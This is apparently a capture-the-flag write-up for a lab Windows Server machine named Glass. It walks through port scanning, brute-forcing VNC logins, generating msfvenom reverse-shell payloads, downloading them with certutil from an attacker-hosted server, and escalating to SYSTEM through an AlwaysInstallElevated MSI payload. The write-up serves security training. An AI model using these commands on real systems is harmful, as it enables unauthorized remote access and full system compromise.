# Glass ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fb33a9a859c0e7e3c8ce1788f92d74203a7666ae%2Fimage.png?alt=media) ## Nmap ``` sudo nmap 172.31.1.25 -p- -sS -sC PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server | rdp-ntlm-info: | Target_Name: GLASS | NetBIOS_Domain_Name: GLASS | NetBIOS_Computer_Name: GLASS | DNS_Domain_Name: Glass | DNS_Computer_Name: Glass | Product_Version: 10.0.17763 |_ System_Time: 2020-12-21T18:33:17+00:00 | ssl-cert: Subject: commonName=Glass | Not valid before: 2020-07-22T18:19:53 |_Not valid after: 2021-01-21T18:19:53 |_ssl-date: 2020-12-21T18:33:17+00:00; 0s from scanner time. 5800/tcp open vnc-http |_http-title: TightVNC desktop [glass] 5900/tcp open vnc | vnc-info: | Protocol version: 3.8 | Security types: | VNC Authentication (2) | Tight (16) | Tight auth subtypes: |_ STDV VNCAUTH_ (2) 5985/tcp open wsman 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49669/tcp open unknown 49675/tcp open unknown 49676/tcp open unknown ``` ## SMB As per standard we can start with a quick null authentication check with SMB. However, we receive no access. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-04c2306803ee82af626eb26abe182ccb73373679%2Fimage.png?alt=media) ## VNC Looking at ports 5800 and 5900 we do have VNC running. `metasploit` has a login scanner module that we can use to enumerate VNC logins `auxiliary/scanner/vnc/vnc_login` Set the RHOSTS and RPORT settings and then run with default settings. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-42ba340aa2aabe16ab3fe1d47db56e42911477e8%2Fimage.png?alt=media) `metasploit` picks up a login of \:password. Kali comes prei-nstalled with a tool called `vncviewer` which we can use to try and log into the remote machine with. ## Initial Foothold When running the `vncviewer` command on Kali you will be prompted for server IP and password. After entering these you should be presented with the screen below. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dfd141438b3b2a2ca1b9528845b60580bce5770a%2Fimage.png?alt=media) I will now create a reverse shell and then host it on a `Python SimpleHTTPServer` and download it to the victim machine with `certutil.exe` First in Kali we create a reverse shell executable with `msfvenom`. ``` msfvenom -p windows/x64/shell/reverse_tcp lhost= lport=4455 -f exe -o ``` We can then move to the directory location of the payload we just created and host a Python HTTP server. ``` sudo python2 -m SimpleHTTPServer 80 ``` We can now open a `netcat` listener on our attacking machine specifying the listening port as the one we defined in the `msfvenom` payload. ``` nc -lvp 4455 ``` On the attacking machine we can open `cmd.exe` and then use `certutil.exe` to download the payload we created. ``` cmd.exe /c certutil.exe -f -urlcache -split http://10.10.0.176/connect.exe ``` When ready invoke the payload. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ba1a99c0f6cbf70313bc4babd092e83ba6236449%2Fimage.png?alt=media) We now get a shell on our attacking machine. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d613c679505d6fcaba51eac4c0f7ca164e5aa23%2Fimage.png?alt=media) ## Privilege Escalation A quick check on our groups and privileges shows we do not belong to any interesting groups or have any interesting permissions. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4fcd8413a69b94a23b308989d49a979e7331d89c%2Fimage.png?alt=media) The `systeminfo` command shows we are running on Windows Server 2019. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f360434c06cf78e35604d94cd2069006d4875333%2Fimage.png?alt=media) We can upload winPEAS.exe to the server to further help us with the privilege escalation stage of our attack. winPEAS soon picks up AlwaysInstallElevated being set to 1 which means true. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-124b039103d671ca8f57dc7346f6ab3f5661385c%2Fimage.png?alt=media) When AlwaysInstallElevated is set to 1 MSI files that are invoked will run with SYSTEM permissions. We can use `msfvenom` to create a reverse shell MSI payload which we can then run on the system. ``` msfvenom -p windows/x64/shell_reverse_tcp lhost= lport=4466 -f msi -o ``` We can then start another `netcat` listener on our attacking machine and again download the payload to the victim server with `certutil.exe` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-68c68e0850b5ce423261dd77036684ec9ec126f9%2Fimage.png?alt=media) Our `netcat` listener then picks up a shell and we confirm we are running as SYSTEM. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-900743d1b72def51de9c273c47cb6c870d0387e1%2Fimage.png?alt=media)